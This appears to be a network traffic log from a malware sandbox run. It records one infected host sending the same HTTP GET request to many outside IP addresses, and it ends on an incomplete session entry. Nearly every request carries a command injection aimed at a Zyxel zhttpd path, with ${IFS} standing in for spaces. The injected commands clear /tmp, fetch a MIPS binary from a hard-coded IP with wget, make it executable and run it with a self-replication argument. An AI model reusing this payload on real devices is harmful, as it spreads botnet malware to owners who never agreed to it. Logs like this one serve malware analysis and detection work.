                                                        Jan 28, 2024 10:12:51.378530979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4021192.168.2.144323858.215.152.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378562927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4022192.168.2.144963676.227.242.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378606081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4023192.168.2.143406843.128.160.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378618956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4024192.168.2.1445794125.161.228.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378674030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4025192.168.2.144383686.161.198.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378735065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4026192.168.2.1439916119.240.174.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378768921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4027192.168.2.1455964195.70.189.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378798962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4028192.168.2.1457988169.106.150.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378834963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4029192.168.2.1443030152.73.185.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378880024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4030192.168.2.1447926151.112.26.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378890038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4031192.168.2.14560468.213.130.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378948927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4032192.168.2.1434330138.169.120.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.378971100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4033192.168.2.1459446179.235.250.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379007101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4034192.168.2.1452026169.59.1.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379050016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4035192.168.2.1456984173.66.123.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379080057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4036192.168.2.143960269.67.119.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379162073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4037192.168.2.143826664.111.255.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379170895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4038192.168.2.1433162173.88.243.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379199982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4039192.168.2.1457320219.201.236.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379247904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4040192.168.2.145329845.128.109.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379259109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4041192.168.2.144719014.46.165.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379298925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4042192.168.2.145173838.122.122.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379333019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4043192.168.2.145638235.39.243.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379354954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4044192.168.2.14561061.229.215.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379403114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4045192.168.2.144938868.92.146.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379441023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4046192.168.2.1450742187.103.203.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379472017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4047192.168.2.145082057.144.184.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379520893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4048192.168.2.145981461.15.84.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379550934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4049192.168.2.1438960147.191.162.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379614115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4050192.168.2.1438016186.102.87.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379635096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4051192.168.2.144770068.41.31.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379692078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4052192.168.2.144330025.212.20.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379717112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4053192.168.2.1445712202.51.12.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379767895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4054192.168.2.14545608.120.189.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379800081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4055192.168.2.1457252172.165.23.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379834890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4056192.168.2.145192271.38.172.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379861116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4057192.168.2.1447200212.15.234.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379904032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4058192.168.2.1449412223.80.67.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379939079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4059192.168.2.146012679.100.206.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.379971981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4060192.168.2.1436674159.236.248.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380017042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4061192.168.2.1445430147.255.70.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380038977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4062192.168.2.144391438.114.16.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380076885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4063192.168.2.1436524201.80.12.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380115986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4064192.168.2.1445846110.237.104.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380157948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4065192.168.2.1432852102.147.234.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380184889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4066192.168.2.143824497.72.204.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380229950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4067192.168.2.143380287.179.223.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380270004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4068192.168.2.145206482.203.44.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380304098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4069192.168.2.144945478.137.160.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380325079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4070192.168.2.144312872.137.13.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380366087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4071192.168.2.1452546211.115.225.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380386114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4072192.168.2.144515294.210.239.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380433083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4073192.168.2.1456994204.120.238.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380472898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4074192.168.2.1448288168.172.88.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380516052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4075192.168.2.145564841.195.180.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380568027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4076192.168.2.144675485.108.36.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380608082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4077192.168.2.1446352141.200.125.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380652905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4078192.168.2.1460380156.228.111.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380681038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4079192.168.2.1434420222.156.82.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380717993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4080192.168.2.143780665.182.121.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.380747080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4081192.168.2.1446362166.67.35.225443
                                                        TimestampBytes transferredDirectionData
